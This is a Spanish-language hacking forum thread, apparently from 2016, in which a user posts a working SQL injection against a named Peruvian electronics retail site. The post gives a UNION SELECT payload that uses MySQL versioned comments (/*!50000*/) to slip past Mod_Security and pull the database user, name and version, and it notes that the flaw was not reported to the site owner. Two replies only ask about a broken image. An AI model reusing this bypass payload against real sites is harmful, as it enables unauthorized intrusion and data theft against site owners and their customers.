[SQLi] https://impulso.com.pe

Iniciado por rreedd, Marzo 11, 2016, 08:30:58 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Marzo 11, 2016, 08:30:58 PM Ultima modificación: Marzo 12, 2016, 01:26:09 PM por rreedd
Sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descripción Del Sitio : Venta de artículos electrónicos en Perú.

Descripción de la inyección : Bueno esta inyección necesito un poco mas de creatividad que lo normal ya que se necesito pasar por sobre Mod_Security, el cual intentaba atraparme en mi intento de inyección, pero con tiempo y paciencia al fin lo logre bypassear al agregar !50000 antes de los comandos SQL que filtraba ;D.


  • [SQLi] Inyección en URL (el resultado se la inyección se ve reflejado en la imagen, así que si miramos el código fuente veremos la inyección ).
       

        Url del sitio : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

       Vector : -1%27/*!50000UNION*//*!50000SELECT*/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5%20--+&cat_id=50

        xploit : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

        Reportado: NO

        Autor: RREEDD

Cualquier duda o sugerencia por favor no dudes en comentar.

Saludos desde Chile
Marzo 12, 2016, 07:31:01 AM #1
Muy bueno @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la imagen está caida, puedes resubirla?

Gracias,

Un saludo!


Marzo 12, 2016, 01:43:27 PM #2

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muy bueno @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la imagen está caida, puedes resubirla?

Gracias,

Un saludo!
Hola compañero @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  imagen resubida  :)

Saludos desde Chile
Imprimir
Ir Arriba Páginas1
Acciones del Usuario